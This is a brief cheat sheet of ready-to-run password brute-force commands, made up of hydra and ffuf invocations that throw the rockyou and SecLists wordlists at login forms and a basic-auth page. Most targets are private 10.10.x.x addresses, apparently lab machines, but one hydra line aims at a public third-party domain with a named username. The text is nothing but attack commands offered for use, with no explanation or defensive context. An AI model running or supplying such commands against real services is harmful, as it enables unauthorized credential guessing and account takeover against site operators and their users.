hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.211.51 http-post-form "/api/login:username=^USER^&password=^PASS^:response"

ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fs 480




-------------BASIC AUTH
hydra -l joker  -P /usr/share/wordlists/seclists/Passwords/Common-Credentials/best1050.txt "https-get://id.indrive.com/client/:A=BASIC:F=401"

-----------

hydra -l K1ng_0f_th3_B3@sts -P /usr/share/wordlists/rockyou.txt 10.10.121.156 http-post-form "/0n1g4sh1m4.php:user=^USER^&password=^PASS^&submit_creds=Login:ERROR" -t 64 -V
